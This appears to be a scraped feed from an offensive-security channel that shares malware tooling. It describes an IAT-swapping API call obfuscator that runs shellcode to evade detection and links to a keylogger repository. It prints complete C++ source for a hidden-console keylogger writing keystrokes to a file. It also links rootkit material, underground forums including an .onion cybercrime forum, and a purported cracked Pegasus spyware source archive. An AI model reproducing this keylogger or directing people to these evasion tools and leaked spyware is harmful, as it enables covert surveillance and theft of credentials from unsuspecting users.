This is pretty straightforward. Let's say I've used VirtualProtect and I want to obfuscate it with Sleep: the tool will manipulate the IAT so that the thunk that points to VirtualProtect will instead point to Sleep. When the file is executed, the Windows loader will load Sleep instead of VirtualProtect and move execution to the entry point. From there, execution is redirected to the shellcode the tool placed earlier, which finds the address of VirtualProtect and uses it to replace the address of Sleep that was assigned earlier by the loader.
https://github.com/d35ha/CallObfuscator
GitHub - d35ha/CallObfuscator: Obfuscate specific windows apis with different apis
Source Byte
Loggy is a keylogger that is created in C++ https://github.com/Black0utDev/Loggy
Simple one I wrote
#include <Windows.h>
#include <iostream>
#include <fstream>
#include <stdio.h>
#include <string>
using namespace std;
void WriteToLog(LPCSTR text)
{
ofstream logFile;
logFile.open("Keys.txt", fstream::app);
// logFile << text;
logFile.close();
}
int main()
{
char key;
while (TRUE)
{
ShowWindow(GetConsoleWindow(), 0);
Sleep(10);
for (key = 0x8; key <= 0xBE; key++)
{
if (GetAsyncKeyState(key) == -32767)
{
ofstream logFile;
logFile.open("Keys.txt", fstream::app);
logFile << key;
logFile.close();
}
}
}
return 0;
}
Introduction to stack management in x86-64 architecture for Windows
(credits @3shw4r)
offensivecraft.wordpress.com…
#stack , #windows , #stack_managment
CodeMachine - Windows Kernel Rootkit Techniques-unlocked.pdf
5.2 MB
CodeMachine - Windows Kernel Rootkit Techniques
Most operating systems support kernel-mode device drivers, which execute with the same privileges as the operating system itself. As such, many kernel
https://www.coursefather.com/2023/12/Windows-rootkits-kernel.html?m=1
#froum
https://bbs.kafan.cn/
https://bbs.pediy.com/
http://club.vfocus.net/index.php
https://www.xf1433.com/
https://www.52pojie.cn/forum.php
https://www.77169.net/
https://bbs.mayidui.net/
https://www.5566.net/
https://forum.butian.net/
https://unsafe.sh/
http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/65150/
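bbs.kafan.cn
Kafan Forum - The best software forum - Discussion - Mutual help and sharing - Open-minded and modest!
It is the most famous software forum in China, with a friendly, enthusiastic and open atmosphere for discussion that is second to none, building the best software exchange platform in the country!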
Pegasus-Cracked_By_Fsociety_Source_Code.rar
139.2 MB
Pegasus-cracked
#pegasus
Online C++ to Assembly Converter
(+) CodeConvert
(+) Compiler Explorer
(+) Code Beautify
(+) C to VSCPU ASM Converter
(+) ConV
(+) CtoAssembly
#reverse #useful